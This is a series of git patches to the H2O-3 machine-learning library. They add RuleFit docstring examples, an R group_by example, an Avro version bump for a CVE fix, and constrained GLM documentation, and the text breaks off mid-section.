From 99aafb037de55f0dd3de992ee1c121212a3f574f Mon Sep 17 00:00:00 2001 From: Shaun <124687868+shaunyogeshwaran@users.noreply.github.com> Date: Fri, 11 Oct 2024 21:04:28 +0530 Subject: [PATCH 01/12] added rule_example (#16415) added predict_rules. added example for algorithm. added max_categorical_levels example. added max_num_rules example added min_rule_length example. added model_type example. added distribution example added rule_generateion_ntrees example. --- h2o-bindings/bin/custom/python/gen_rulefit.py | 158 ++++++++++++++++- h2o-py/h2o/estimators/rulefit.py | 162 +++++++++++++++++- 2 files changed, 318 insertions(+), 2 deletions(-) diff --git a/h2o-bindings/bin/custom/python/gen_rulefit.py b/h2o-bindings/bin/custom/python/gen_rulefit.py index 55a01c4057db..9ac14b842743 100644 --- a/h2o-bindings/bin/custom/python/gen_rulefit.py +++ b/h2o-bindings/bin/custom/python/gen_rulefit.py @@ -6,6 +6,21 @@ def rule_importance(self): Retrieve rule importances for a Rulefit model :return: H2OTwoDimTable + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> rule_importance = rfit.rule_importance() + >>> print(rfit.rule_importance()) """ if self._model_json["algo"] != "rulefit": raise H2OValueError("This function is available for Rulefit models only") @@ -18,11 +33,29 @@ def rule_importance(self): def predict_rules(self, frame, rule_ids): """ - Evaluates validity of the given rules on the given data. + Evaluates validity of the given rules on the given data. :param frame: H2OFrame on which rule validity is to be evaluated :param rule_ids: string array of rule ids to be evaluated against the frame :return: H2OFrame with a column per each input ruleId, representing a flag whether given rule is applied to the observation or not. + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv" + >>> df = h2o.import_file(path=f, col_types={'species': "enum"}) + >>> x = df.columns + >>> y = "species" + >>> x.remove(y) + >>> train, test = df.split_frame(ratios=[.8], seed=1234) + >>> rfit = H2ORuleFitEstimator(min_rule_length=4, + ... max_rule_length=5, + ... max_num_rules=3, + ... seed=1234, + ... model_type="rules") + >>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test) + >>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica'])) """ from h2o.frame import H2OFrame from h2o.utils.typechecks import assert_is_type @@ -52,3 +85,126 @@ def predict_rules(self, frame, rule_ids): """ ), ) + +examples = dict( + algorithm=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... algorithm="gbm", +... 
seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) + +""", + max_categorical_levels=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... max_categorical_levels=11, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + max_num_rules=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=3, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + min_rule_length=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... min_rule_length=4, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + max_rule_length=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... min_rule_length=3, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + model_type=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... model_type="rules", +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + distribution=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... distribution="bernoulli", +... 
seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + rule_generation_ntrees=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... rule_generation_ntrees=60, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""" +) diff --git a/h2o-py/h2o/estimators/rulefit.py b/h2o-py/h2o/estimators/rulefit.py index 529b371780ea..be80309794b0 100644 --- a/h2o-py/h2o/estimators/rulefit.py +++ b/h2o-py/h2o/estimators/rulefit.py @@ -206,6 +206,22 @@ def algorithm(self): The algorithm to use to generate rules. Type: ``Literal["auto", "drf", "gbm"]``, defaults to ``"auto"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... algorithm="gbm", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("algorithm") @@ -220,6 +236,22 @@ def min_rule_length(self): Minimum length of rules. Defaults to 3. Type: ``int``, defaults to ``3``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... min_rule_length=4, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("min_rule_length") @@ -234,6 +266,22 @@ def max_rule_length(self): Maximum length of rules. Defaults to 3. Type: ``int``, defaults to ``3``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... min_rule_length=3, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_rule_length") @@ -249,6 +297,21 @@ def max_num_rules(self): by diminishing returns in model deviance. Type: ``int``, defaults to ``-1``. 
+ + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=3, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_num_rules") @@ -263,6 +326,22 @@ def model_type(self): Specifies type of base learners in the ensemble. Type: ``Literal["rules_and_linear", "rules", "linear"]``, defaults to ``"rules_and_linear"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... model_type="rules", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("model_type") @@ -298,6 +377,22 @@ def distribution(self): Type: ``Literal["auto", "bernoulli", "multinomial", "gaussian", "poisson", "gamma", "tweedie", "laplace", "quantile", "huber"]``, defaults to ``"auto"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... distribution="bernoulli", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("distribution") @@ -312,6 +407,22 @@ def rule_generation_ntrees(self): Specifies the number of trees to build in the tree model. Defaults to 50. Type: ``int``, defaults to ``50``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... rule_generation_ntrees=60, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("rule_generation_ntrees") @@ -370,6 +481,22 @@ def max_categorical_levels(self): for categorical_encoding == EnumLimited. Type: ``int``, defaults to ``10``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... 
max_categorical_levels=11, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_categorical_levels") @@ -385,6 +512,21 @@ def rule_importance(self): Retrieve rule importances for a Rulefit model :return: H2OTwoDimTable + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> rule_importance = rfit.rule_importance() + >>> print(rfit.rule_importance()) """ if self._model_json["algo"] != "rulefit": raise H2OValueError("This function is available for Rulefit models only") @@ -397,11 +539,29 @@ def rule_importance(self): def predict_rules(self, frame, rule_ids): """ - Evaluates validity of the given rules on the given data. + Evaluates validity of the given rules on the given data. :param frame: H2OFrame on which rule validity is to be evaluated :param rule_ids: string array of rule ids to be evaluated against the frame :return: H2OFrame with a column per each input ruleId, representing a flag whether given rule is applied to the observation or not. + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv" + >>> df = h2o.import_file(path=f, col_types={'species': "enum"}) + >>> x = df.columns + >>> y = "species" + >>> x.remove(y) + >>> train, test = df.split_frame(ratios=[.8], seed=1234) + >>> rfit = H2ORuleFitEstimator(min_rule_length=4, + ... max_rule_length=5, + ... max_num_rules=3, + ... seed=1234, + ... model_type="rules") + >>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test) + >>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica'])) """ from h2o.frame import H2OFrame from h2o.utils.typechecks import assert_is_type From d97dca2276442209e1601d7d5fdacd26efc73f2b Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Tue, 15 Oct 2024 10:28:37 -0500 Subject: [PATCH 02/12] GH-16338: Added group by clarification R example for `gb.control` (#16404) * ht/base example * ht/added prediction * ht/code test & example headers * ht/fixed rendering --- h2o-docs/src/product/data-munging/groupby.rst | 63 ++++++++++++++++++- 1 file changed, 61 insertions(+), 2 deletions(-) diff --git a/h2o-docs/src/product/data-munging/groupby.rst b/h2o-docs/src/product/data-munging/groupby.rst index 2e87f7a6f2ff..f87e278a685e 100644 --- a/h2o-docs/src/product/data-munging/groupby.rst +++ b/h2o-docs/src/product/data-munging/groupby.rst @@ -66,8 +66,10 @@ In addition to the above parameters, any number of the following aggregations ca Once the aggregation operations are complete, calling the GroupBy object with a new set of aggregations will yield no effect. You must generate a new GroupBy object in order to apply a new aggregation on it. In addition, certain aggregations are only defined for numerical or categorical columns. An error will be thrown for calling aggregation on the wrong data types. 
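+The snippet below is a minimal Python sketch of this behavior (it assumes the airlines dataset used in the examples that follow): each set of aggregations requires its own ``GroupBy`` object, and the aggregated result is retrieved with ``get_frame()``.
+
+::
+
+    import h2o
+    h2o.init()
+    airlines = h2o.import_file("https://s3.amazonaws.com/h2o-airlines-unpacked/allyears2k.csv")
+
+    # Aggregations are fixed once applied; retrieve this result with get_frame():
+    counts = airlines.group_by(by="Origin").count(na="rm").get_frame()
+
+    # Calling the same GroupBy object with new aggregations has no effect,
+    # so generate a new GroupBy object for each new aggregation:
+    means = airlines.group_by(by="Origin").mean(col="Distance", na="rm").get_frame()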
-Example
--------
+Examples
+--------
+
+The following examples in Python and R show how to find the months with the highest cancellation ratio using ``group_by``.
 
 .. tabs::
    .. code-tab:: python
@@ -212,3 +214,60 @@ Example
     4     ALB              3646        49         50
     5     AMA               317         4          6
     6     ANC               100         0          1
+
+The following R code shows how to specify per-variable options with ``gb.control``.
+
+.. tabs::
+
+   .. code-tab:: r R
+
+        # Import H2O-3:
+        library(h2o)
+        h2o.init()
+
+        # Import the airlines dataset:
+        airlines.hex <- h2o.importFile("https://s3.amazonaws.com/h2o-airlines-unpacked/allyears2k.csv")
+
+        # View quantiles and histograms:
+        quantile(x = airlines.hex$ArrDelay, na.rm = TRUE)
+        h2o.hist(airlines.hex$ArrDelay)
+
+        # Find the number of flights by airport:
+        originFlights <- h2o.group_by(data = airlines.hex, by = "Origin", nrow("Origin"), gb.control = list(na.methods = "rm"))
+        originFlights.R <- as.data.frame(originFlights)
+
+        # Find the number of flights per month:
+        flightsByMonth <- h2o.group_by(data = airlines.hex, by = "Month", nrow("Month"), gb.control = list(na.methods = "rm"))
+        flightsByMonth.R <- as.data.frame(flightsByMonth)
+
+        # Find months with the highest cancellation ratio:
+        which(colnames(airlines.hex) == "Cancelled")
+        cancellationsByMonth <- h2o.group_by(data = airlines.hex, by = "Month", sum("Cancelled"), gb.control = list(na.methods = "rm"))
+        cancellation_rate <- cancellationsByMonth$sum_Cancelled/flightsByMonth$nrow
+        rates_table <- h2o.cbind(flightsByMonth$Month, cancellation_rate)
+        rates_table.R <- as.data.frame(rates_table)
+
+        # Construct test and train sets using sampling:
+        airlines.split <- h2o.splitFrame(data = airlines.hex, ratios = 0.85)
+        airlines.train <- airlines.split[[1]]
+        airlines.test <- airlines.split[[2]]
+
+        # Display a summary using table-like functions:
+        h2o.table(airlines.train$Cancelled)
+        h2o.table(airlines.test$Cancelled)
+
+        # Set the predictor and response variables:
+        Y <- "IsDepDelayed"
+        X <- c("Origin", "Dest", "DayofMonth", "Year", "UniqueCarrier", "DayOfWeek", "Month", "DepTime", "ArrTime", "Distance")
+
+        # Define the data for the model and display the results:
+        airlines.glm <- h2o.glm(training_frame = airlines.train, x = X, y = Y, family = "binomial", alpha = 0.5)
+
+        # View the model information (training statistics, performance, important variables):
+        summary(airlines.glm)
+
+        # Predict using the GLM model:
+        pred <- h2o.predict(object = airlines.glm, newdata = airlines.test)
+
+        # Look at the summary of predictions (probability of TRUE class p1):
+        summary(pred$p1)

From 248aa6458246584099484c567782f1619f1b06f6 Mon Sep 17 00:00:00 2001
From: Adam Valenta
Date: Wed, 16 Oct 2024 17:12:06 +0200
Subject: [PATCH 03/12] GH-16416 - update avro to fix CVE-2024-47561 (#16422)

---
 h2o-parsers/h2o-avro-parser/build.gradle | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/h2o-parsers/h2o-avro-parser/build.gradle b/h2o-parsers/h2o-avro-parser/build.gradle
index be498665d8ed..d61f58043d90 100644
--- a/h2o-parsers/h2o-avro-parser/build.gradle
+++ b/h2o-parsers/h2o-avro-parser/build.gradle
@@ -6,7 +6,7 @@ description = "H2O Avro Parser"
 dependencies {
     api project(":h2o-core")
     // Avro support
-    api 'org.apache.avro:avro:1.11.3'
+    api 'org.apache.avro:avro:1.11.4'
 
     testImplementation project(":h2o-test-support")
     testRuntimeOnly project(":${defaultWebserverModule}")

From dd4458746b2b15aa9372ae166de1dddb9647537b Mon Sep 17 00:00:00 2001
From: Hannah <52463461+hannah-tillman@users.noreply.github.com>
Date: Sun, 20 Oct 2024 19:12:08 -0500
Subject: [PATCH 04/12] GH-16208: 
Adding constrained GLM documentation to the user guide [nocheck] [nochecks] (#16394)

* ht/constrained glm integration
* ht/max_iterations
* ht/initial review equations
* ht/remove below eq5
* ht/added in examples
* ht/requested changes
---
 h2o-docs/src/product/data-science/glm.rst | 219 ++++++++++++++++++++++
 1 file changed, 219 insertions(+)

diff --git a/h2o-docs/src/product/data-science/glm.rst b/h2o-docs/src/product/data-science/glm.rst
index 565648f504db..161d57698fdc 100644
--- a/h2o-docs/src/product/data-science/glm.rst
+++ b/h2o-docs/src/product/data-science/glm.rst
@@ -63,6 +63,8 @@ Algorithm-specific parameters
 
 - `interaction_pairs `__: When defining interactions, use this option to specify a list of pairwise column interactions (interactions between two variables). Note that this is different than ``interactions``, which will compute all pairwise combinations of specified columns.
 
+**max_iterations**: For GLM, must be :math:`\geq` 1 to obtain a proper model (or -1 for unlimited, which is the default setting). Setting it to 0 will only return the correct coefficient names and an empty model.
+
 - **max_iterations_dispersion**: Control the maximum number of iterations in the dispersion parameter estimation loop using maximum likelihood. This option defaults to ``1000000``.
 
 - `rand_family `__: The Random Component Family specified as an array. You must include one family for each random component. Currently only ``rand_family=["gaussian"]`` is supported.
 
@@ -1623,6 +1625,219 @@ Variable Inflation Factor Example
 
     vif_glm.get_variable_inflation_factors()
     {'Intercept': nan, 'abs.C1.': 1.0003341467438167, 'abs.C2.': 1.0001734204183244, 'abs.C3.': 1.0007846189027745, 'abs.C4.': 1.0005388379729434, 'abs.C5.': 1.0005349427184604}
 
+Constrained GLM
+~~~~~~~~~~~~~~~
+
+We've implemented the algorithm from Bierlaire's *Optimization: Principles and Algorithms, Chapter 19* [:ref:`8`], which solves the following optimization problem:
+
+.. math::
+
+   \min_{X\in R^n} f(x), \text{subject to } h(x) = 0, g(x) \leq 0 \quad \text{ equation 1}
+
+where:
+
+ - :math:`f: R^n \to R, h: R^n \to R^m, g: R^n \to R^p`
+ - the constraints :math:`h, g` are linear.
+
+However, the actual problem we are solving is:
+
+.. math::
+
+   \min_{X\in R^n} f(x) \text{ subject to } h(x)=0 \quad \text{ equation 2}
+
+The inequality constraints can be converted to equality constraints through simple reasoning and the use of active constraints. We solve the constrained optimization problem by solving the augmented Lagrangian function with a quadratic penalty:
+
+.. math::
+
+   L_c(x,\lambda) = f(x) + \lambda^T h(x) + \frac{c}{2} \| h(x) \|^2 \quad \text{ equation 3}
+
+The basic ideas used to solve the constrained GLM consist of:
+
+a. transforming a constrained problem into a sequence of unconstrained problems;
+b. penalizing possible violations of the constraints more and more heavily over the sequence by increasing the value of :math:`c` at each iteration.
+
+Converting to standard form
+'''''''''''''''''''''''''''
+
+A standard form of :math:`g(x) \leq 0` is the only acceptable form of inequality constraints. For example, if you have a constraint of :math:`2x_1 - 4x_2 \geq 10` where :math:`x_1 \text{ and } x_2` are coefficient names, then you must convert it to :math:`10-2x_1 + 4x_2 \leq 0`.
+
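+As a quick sketch of how such a converted constraint is later passed to the model (``x1`` and ``x2`` are hypothetical coefficient names; the frame layout matches the Python example below), :math:`10 - 2x_1 + 4x_2 \leq 0` could be encoded as:
+
+::
+
+    import h2o
+
+    # One row per term; rows that share a constraint_numbers value form one constraint.
+    rows = [["constant", 10, "LessThanEqual", 0],
+            ["x1", -2, "LessThanEqual", 0],
+            ["x2", 4, "LessThanEqual", 0]]
+    linear_constraints = h2o.H2OFrame(rows)
+    linear_constraints.set_names(["names", "values", "types", "constraint_numbers"])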
+
+Example of constrained GLM
+''''''''''''''''''''''''''
+
+.. tabs::
+   .. code-tab:: r R
+
+        # Import H2O-3 and start the cluster:
+        library(h2o)
+        h2o.init()
+
+        # Import the Gaussian 10,000 rows dataset:
+        h2o_data <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/gaussian_20cols_10000Rows.csv")
+
+        # Set the predictors, response, and enum columns:
+        enum_columns = c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10")
+        for (cname in enum_columns) {
+            h2o_data[cname] <- h2o.asfactor(h2o_data[cname])
+        }
+        myY = "C21"
+        col_names <- names(h2o_data)
+        myX <- col_names[1:20]
+
+        # Set the linear constraints:
+        constraints <- data.frame(names = c("C1.2", "C11", "constant", "C5.2", "C12", "C15", "constant"),
+                                  values = c(1, 1, 13.56, 1, 1, 1, -5),
+                                  types = c("Equal", "Equal", "Equal", "LessThanEqual", "LessThanEqual", "LessThanEqual", "LessThanEqual"),
+                                  constraint_numbers = c(0, 0, 0, 1, 1, 1, 1))
+        constraints_h2o <- as.h2o(constraints)
+
+        # Set the beta constraints:
+        bc <- data.frame(names = c("C1.1", "C5.2", "C11", "C15"),
+                         lower_bounds = c(-36, -14, 25, 14),
+                         upper_bounds = c(-35, -13, 26, 15))
+        bc_h2o <- as.h2o(bc)
+
+        # Build and train your model:
+        m_sep <- h2o.glm(x=myX,
+                         y=myY,
+                         training_frame=h2o_data,
+                         family='gaussian',
+                         linear_constraints=constraints_h2o,
+                         solver="irlsm",
+                         lambda=0.0,
+                         beta_constraints=bc_h2o,
+                         constraint_eta0=0.1,
+                         constraint_tau=10,
+                         constraint_alpha=0.01,
+                         constraint_beta=0.9,
+                         constraint_c0=100)
+
+        # Find your coefficients:
+        h2o.coef(m_sep)
+
+   .. code-tab:: python
+
+        # Import H2O-3 and the estimator, then start the cluster:
+        import h2o
+        from h2o.estimators import H2OGeneralizedLinearEstimator
+        h2o.init()
+
+        # Import the Gaussian 10,000 rows dataset:
+        h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/gaussian_20cols_10000Rows.csv")
+
+        # Set the predictors, response, and enum columns:
+        enum_columns = ["C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10"]
+        for cname in enum_columns:
+            h2o_data[cname] = h2o_data[cname].asfactor()
+        myY = "C21"
+        myX = h2o_data.names
+        myX.remove(myY)
+
+        # Set the linear constraints:
+        linear_constraints = [] # this constraint is satisfied by default coefficient initialization
+        name = "C1.2"
+        values = 1
+        types = "Equal"
+        constraint_numbers = 0
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "C11"
+        values = 1
+        types = "Equal"
+        constraint_numbers = 0
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "constant"
+        values = 13.56
+        types = "Equal"
+        constraint_numbers = 0
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "C5.2"
+        values = 1
+        types = "LessThanEqual"
+        constraint_numbers = 1
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "C12"
+        values = 1
+        types = "LessThanEqual"
+        constraint_numbers = 1
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "C15"
+        values = 1
+        types = "LessThanEqual"
+        constraint_numbers = 1
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        name = "constant"
+        values = -5
+        types = "LessThanEqual"
+        constraint_numbers = 1
+        linear_constraints.append([name, values, types, constraint_numbers])
+
+        linear_constraints2 = h2o.H2OFrame(linear_constraints)
+        linear_constraints2.set_names(["names", "values", "types", "constraint_numbers"])
+
+        # Set the beta constraints:
+        bc = []
+        name = "C1.1"
+        c1p1LowerBound = -36
+        c1p1UpperBound = -35
+        bc.append([name, c1p1LowerBound, c1p1UpperBound])
+
+        name = "C5.2"
+        c5p2LowerBound = -14
+        c5p2UpperBound = -13
+        bc.append([name, c5p2LowerBound, c5p2UpperBound])
+
+        name = "C11"
+        c11LowerBound = 25
+        c11UpperBound = 26
+        bc.append([name, c11LowerBound, c11UpperBound])
+
+        name = "C15"
+        c15LowerBound = 14
+        c15UpperBound = 15
+        bc.append([name, c15LowerBound, c15UpperBound])
+
+        beta_constraints = h2o.H2OFrame(bc)
+        beta_constraints.set_names(["names", "lower_bounds", "upper_bounds"])
+
+        # Build and train your model:
+        m_sep = H2OGeneralizedLinearEstimator(family='gaussian',
+                                              linear_constraints=linear_constraints2,
+                                              solver="irlsm",
+                                              lambda_=0.0,
+                                              beta_constraints=beta_constraints,
+                                              constraint_eta0=0.1,
+                                              constraint_tau=10,
+                                              constraint_alpha=0.01,
+                                              constraint_beta=0.9,
+                                              constraint_c0=100)
+        m_sep.train(training_frame=h2o_data, x=myX, y=myY)
+
+        # Find your coefficients:
+        coef_sep = m_sep.coef()
+
+Treatment of strict inequalities
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+To convert a strict inequality, perturb it by a small number. For example, :math:`2x_1 - 4x_2 < 0` can be converted to :math:`2x_1 - 4x_2 - 10^{-12} \leq 0`.
+
+Transforming inequality constraints to equality constraints
+'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+This transformation uses slack variables, which are introduced to replace an inequality constraint with an equality constraint. The slack variable should be non-negative. To transform inequality constraints to equality constraints, we proceed as follows:
+
+a. For each inequality constraint of :math:`g(x)`, a slack variable is added to it such that you will have: :math:`g_i(x) - s_i^2 = 0`;
+b. Let :math:`s = \begin{bmatrix} s_1^2 \\ \vdots \\ s_p^2 \\\end{bmatrix}` and :math:`g_{aug}(x) = g(x) - s`;
